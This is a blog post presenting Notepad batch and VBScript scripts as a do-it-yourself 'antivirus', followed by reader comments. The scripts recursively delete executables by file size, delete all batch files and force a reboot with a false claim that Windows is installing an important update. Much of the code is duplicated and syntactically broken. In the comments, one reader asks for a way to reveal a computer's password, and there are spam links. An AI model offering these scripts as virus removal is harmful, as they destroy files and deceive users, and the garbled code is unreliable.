If you are lazy to download antivirus (let alone pay for) there is another way in eradicating the virus. That is, with "Notepad." Okay, the way he is with a script / code that is typed in notepad, then notepad replaced its extension. Well, other than to eradicate the virus, you can surprise your friends who do not know this. Well, here's how:
Method 1: eliminate or eradicate the virus do you know his name
1.Open Notepad
2.Copy and Paste the code below
@echo off
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit
Description: virusname1 and virusname2 be filled with the virus name you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat
Method 2: Remove Virus do you know his name and remove any virus bat
Method 2: Remove Virus do you know his name and remove any virus bat
1.Open Notepad
2.Copy and Paste the code below
x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
del TOR.vbs
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del trojan.bat
del trojan.vbs
del Trojan Horse.Bat
del Trojan Horse.vbs
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
Description: You can add the name of the virus you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat
Does this work?
ReplyDeleteIf it does, then thanks!
ReYco Seguma
ReplyDeletecmd is lack of commands to hack...
ive been use cmd for almost one year by making any batch file..
i am just using cmd for delleting, copying , and opening any file,,
just for fun ,,
the best thing that ive been did with this is to make antivirus using this,,
and for revealing hidden files that been hide by autorun virus...
the code that i want to know is to reveal the computer password..
not to change but to reveal..
not like this command..
net *
because you just change the password ..
i hope someone give me the command to reveal computer password..
by the way i will give some code for anti virus,,
i will give just a litter code because i lazy to write the code..
@echo off
Title Antivirus
color a
a:
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Detecting.........
echo.
echo.
if exist f:\autorun.inf goto d
if not exit f:\autorun.inf goto n
:d
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Virus Detected!!
echo.
echo.
echo Remove Virus?
echo.
echo.
pause
del f:\autorun.inf
goto a
:n
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo No Virus Found!!
echo.
echo.
echo Scan Again?
pause
this is just a simple code..
i dont like to post my code,,,
hehehehehehehehe
ReYco Seguma
ReplyDeletecmd is lack of commands to hack...
ive been use cmd for almost one year by making any batch file..
i am just using cmd for delleting, copying , and opening any file,,
just for fun ,,
the best thing that ive been did with this is to make antivirus using this,,
and for revealing hidden files that been hide by autorun virus...
the code that i want to know is to reveal the computer password..
not to change but to reveal..
not like this command..
net *
because you just change the password ..
i hope someone give me the command to reveal computer password..
by the way i will give some code for anti virus,,
i will give just a litter code because i lazy to write the code..
@echo off
Title Antivirus
color a
a:
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Detecting.........
echo.
echo.
if exist f:\autorun.inf goto d
if not exit f:\autorun.inf goto n
:d
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Virus Detected!!
echo.
echo.
echo Remove Virus?
echo.
echo.
pause
del f:\autorun.inf
goto a
:n
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo No Virus Found!!
echo.
echo.
echo Scan Again?
pause
this is just a simple code..
i dont like to post my code,,,
hehehehehehehehe
ReYco Seguma
ReplyDeletecmd is lack of commands to hack...
ive been use cmd for almost one year by making any batch file..
i am just using cmd for delleting, copying , and opening any file,,
just for fun ,,
the best thing that ive been did with this is to make antivirus using this,,
and for revealing hidden files that been hide by autorun virus...
the code that i want to know is to reveal the computer password..
not to change but to reveal..
not like this command..
net *
because you just change the password ..
i hope someone give me the command to reveal computer password..
by the way i will give some code for anti virus,,
i will give just a litter code because i lazy to write the code..
@echo off
Title Antivirus
color a
a:
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Detecting.........
echo.
echo.
if exist f:\autorun.inf goto d
if not exit f:\autorun.inf goto n
:d
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Virus Detected!!
echo.
echo.
echo Remove Virus?
echo.
echo.
pause
del f:\autorun.inf
goto a
:n
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo No Virus Found!!
echo.
echo.
echo Scan Again?
pause
this is just a simple code..
i dont like to post my code,,,
hehehehehehehehe
ReYco Seguma
ReplyDeletecmd is lack of commands to hack...
ive been use cmd for almost one year by making any batch file..
i am just using cmd for delleting, copying , and opening any file,,
just for fun ,,
the best thing that ive been did with this is to make antivirus using this,,
and for revealing hidden files that been hide by autorun virus...
the code that i want to know is to reveal the computer password..
not to change but to reveal..
not like this command..
net *
because you just change the password ..
i hope someone give me the command to reveal computer password..
by the way i will give some code for anti virus,,
i will give just a litter code because i lazy to write the code..
@echo off
Title Antivirus
color a
a:
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Detecting.........
echo.
echo.
if exist f:\autorun.inf goto d
if not exit f:\autorun.inf goto n
:d
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo Virus Detected!!
echo.
echo.
echo Remove Virus?
echo.
echo.
pause
del f:\autorun.inf
goto a
:n
echo.
echo.
echo.
echo Antivirus
echo -----------------------------------
echo No Virus Found!!
echo.
echo.
echo Scan Again?
pause
this is just a simple code..
i dont like to post my code,,,
hehehehehehehehe
add me,,
Deletelike my page reyco seguma-guitarist
Eco virus
Deletehi can you add some more code for me
DeleteHello Aashir Im Sean and I'm sixteen. I'm a pentester and kinda like a programmer. I like your work and your codes. I deciphered your lazy code. cool right and Ive actually made some antivirus' on my own. I just want to say thank you and I like your work
DeleteDoes these type of command can detect nd remove virus ???????????
ReplyDeletehttp://xthepccrackerx.wordpress.com/2014/05/17/update4/
ReplyDeleteis it real
ReplyDeletedont use notepad to make an antivirus program. Use the programming language like VB.NET or C#.NET
ReplyDeletehttp://ideamindmu.blogspot.com/2015/06/lock-unlock-your-pc-with-usb-flash-drive.html
ReplyDeleteIs this antivirus !!!
ReplyDeleteHi Im from Iran your website is great . And Im 14 years old.
ReplyDeleteat first I cant come to your website because iran filtered it then I come with vpn .
I use your codes that cods are good but when I start the cod my compute restarts and I
I was alot afraid and my face color change to white I thought that is dangerous cod and
I think that cod is like some cod that restarts computer again after restart .
I was alot scared but my computer opens normal then I dont afraid ___>>(Sorry my English is very bad)
Its good cod for remowing trojans.
thanks alot .
(Sorry may English is bad)
Bye.
hello boy?
DeleteI'm really glad to see a 14year boy interested in this kind of programming, well I'm Aashir Shaikh, I'm a programmer, and I'm 17years old
brother? can we chat on facebook?
here's my facebook accout: www.fb.com/aashir.shaikh.121
What is this file?
ReplyDeleteCool logon script
ReplyDelete@echo off
:MAIN
cls
echo.
echo Enter your username
echo.
set /p "username= > "
if %username%==USERNAME1 goto PASSWORD
goto ERROR1
:ERROR1
echo.
echo The username was not found, please try again.
echo.
pause
goto MAIN
:PASSWORD
cls
echo.
echo Enter your password
echo.
set /p "password= > "
if %password%==PASSWORD1 goto OK
goto ERROR2
:ERROR2
echo.
echo The password is incorrect, please try again.
echo.
pause
goto PASSWORD
:OK
cls
echo.
echo Welcome %username%,
if %password%==PASSWORD1 goto PROGRAM
echo.
pause
:PROGRAM
Under :PROGRAM put your program coding you want login-protected.
del filename.exe
ReplyDeletei donot understand what you mean by "virus do you know his name" plz quickly reply
ReplyDeleteI Like this post and thanks to share. Post is very nice! By the way, I want to share with you information about the best:
ReplyDeleteAntivirus Helpline Number USA
Avast Helpline Support Number USA
I’ve read some good stuff here. Definitely worth bookmarking for revisiting. I surprise how much effort you put to create such a great informative website. online password protected notepad
ReplyDeleteNice Blog!!
ReplyDeletePlease Visit here at Download Malwarebytes Protection
Hello, this weekend is good for me, since this time i am reading this enormous informative article here at my home. https://yebhideal.com/product-category/quick-heal/
ReplyDeleteserver betriebssystem windows Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info.
ReplyDelete